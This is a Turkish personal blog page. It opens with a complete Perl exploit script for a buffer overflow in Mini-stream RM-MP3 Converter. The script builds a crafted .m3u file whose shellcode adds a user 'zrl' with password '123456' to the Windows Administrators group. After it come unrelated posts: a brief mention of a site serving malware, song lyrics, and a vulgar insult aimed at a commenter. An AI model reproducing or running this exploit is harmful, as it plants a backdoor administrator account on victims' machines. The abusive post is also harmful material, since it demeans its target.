# Title : Mini-stream RM-MP3 Converter Buffer Overflow Exploit
# Author : ZoRLu
# Proof : http://img843.imageshack.us/img843/3144/buffer.jpg
# Desc. : usr: zrl , pass: 123456 , localgroup: Administrator
#Tested : xp/sp3
# mail-msn : admin@yildirimordulari.com
# Home : http://z0rlu.blogspot.com
# Date : 04/01/2011
# Teşekkür : Dr.Ly0n LifeSteaLeR
my $dosya= "zrl.m3u";
my $zart= "\x41" x 26059;
my $zurt= "\x90" x 24;
my $eip = pack('V',0x7E3EA32F); # 0x7E3EA32F user32.dll jmp esp
# windows/exec - 127 bytes
# Thanks to http://www.exploit-db.com/exploits/15063/
# Encoder: win32/ZoRLu
# Desc.: usr: zrl , pass: 123456
# CMD=Add Admin
my $shell = "\xeb\x1b\x5b\x31\xc0\x50\x31\xc0\x88\x43\x5d\x53\xbb\xad\x23\x86\x7c".
"\xff\xd3\x31\xc0\x50\xbb\xfa\xca\x81\x7c\xff\xd3\xe8\xe0\xff\xff\xff".
"\x63\x6d\x64\x2e\x65\x78\x65\x20\x2f\x63\x20\x6e\x65\x74\x20\x75\x73".
"\x65\x72\x20\x7a\x72\x6c\x20\x31\x32\x33\x34\x35\x36\x20\x2f\x61\x64".
"\x64\x20\x26\x26\x20\x6e\x65\x74\x20\x6c\x6f\x63\x61\x6c\x67\x72\x6f".
"\x75\x70\x20\x41\x64\x6d\x69\x6e\x69\x73\x74\x72\x61\x74\x6f\x72\x73".
"\x20\x2f\x61\x64\x64\x20\x7a\x72\x6c\x20\x26\x26\x20\x6e\x65\x74\x20".
"\x75\x73\x65\x72\x20\x7a\x72\x6c";
open($FILE,">$dosya");
print $FILE $zart.$eip.$zurt.$shell;
close($FILE);
print "\n$dosya Dosyasi Hazir\n";
17 Ocak 2011 Pazartesi
Mini-stream RM-MP3 Converter Buffer Overflow Exploit
5 Ocak 2011 Çarşamba
küçük bir analiz
bugün bir siteye denk geldim biraz kurcalarken aşağıda ki durumla karsılastım
direk kaynağı görüntüledim ve bir adresle karsılastım
belirtilen siteye gittim ("http://divenci.com.br/2009/yaa.htm") ve orda da kaynağı görüntüledim aşağıda ki gibi encode edilmiş kodlarla karsılastım
kodları decode ettim sonucu sizlerde az cok tahmin etmişsinizdir
site üzereinden bilgisayara "bhr.exe" dosyası yükleniyordu :)
direk kaynağı görüntüledim ve bir adresle karsılastım
belirtilen siteye gittim ("http://divenci.com.br/2009/yaa.htm") ve orda da kaynağı görüntüledim aşağıda ki gibi encode edilmiş kodlarla karsılastım
kodları decode ettim sonucu sizlerde az cok tahmin etmişsinizdir
site üzereinden bilgisayara "bhr.exe" dosyası yükleniyordu :)
3 Ocak 2011 Pazartesi
Öykü-Berk Geceler Düsman
Oyku & Berk Geceler Dusman 2009 Zamanla.Net Zmuzik.Net
Yükleyen Zamanlanet. - Yüksek çözünürlüklü video keyfini yaşayın!
Etiketler:
öykü berk kardeşler,
öykü biyografi,
Öykü-Berk Geceler Düsman
Öykü - Berk Yaktın Yandırdın Beni
Oyku & Berk Yaktın Yandırdın Beni 2009 Zmuzik.Net
Yükleyen Zamanlanet. - Öne çıkan müzik videolarını izleyin.
Siyah perçemini yar yar
Dökmüş yüzüne
Salınarak gelen humaya bakın
Kimden söz işitmiş yar yar
Düşmüş yüzüne
Keder yakışmayan simaya bakın
Yar yar yar yar eylemen
Yaktın yandırdın beni
Zalım aldattın beni
Ne dedimde darıldın
Bir kula sattın beni
Yandırdın yaktın beni
Zalim aldattın beni
Ne dedimde darıldın
Bir kula sattın beni
Al göğsün üstüne yar yar
Bir bağ dikilmiş
Bin bir çeşit çiçeklerden ekilmiş
Dün uğradım bir ücraya çekilmiş
Bulutmu kaplamış şu aya bakın
Yar yar yar eylenemem
Yaktın yandırdın beni
Zalım aldattın beni
Ne dedimde darıldın
Bir kula sattın beni
Yandırdın yaktın beni
Zalim aldattın beni
Ne dedimde darıldın
Bir kula sattın beni
götün birine hitaben 3 / +18
ben adama diyorum ki "umarın sevgili annenin kıymetini biliyosundur" onun yaptığı yoruma bakın :DD yavru ananı siktirmeye bu kadar meraklıysan, bu çok hoşuna gidiyorsa, evde boş oturma in aşağı yoldan birini çevir bu işi zevkle yapacaktır. belliki anan seni doğmamış "SIÇMIŞ" yoksa hangi insan evladı bu kadar şereften haysiyetten yoksun olabilir ki :DD hee öyle sürekli giremiyorum bloğa o yüzden geç konu acıyorum sen yorumunu yaz ben gelir konuyu acarım acele etme yani :DD
NOT: Değerli okuyucularım sizler bu konuyu okumayın sadece o gerizekalı için açıyorum bu konuyu ee her kesime hitap etmek zorundayım :DD
Kaydol:
Kayıtlar (Atom)